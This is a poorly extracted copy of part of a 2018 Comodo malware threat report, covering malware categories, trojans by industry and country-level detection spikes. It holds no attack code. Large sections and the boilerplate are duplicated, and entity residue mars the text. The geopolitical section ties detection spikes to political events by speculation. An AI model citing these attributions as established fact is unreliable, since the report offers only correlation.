Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
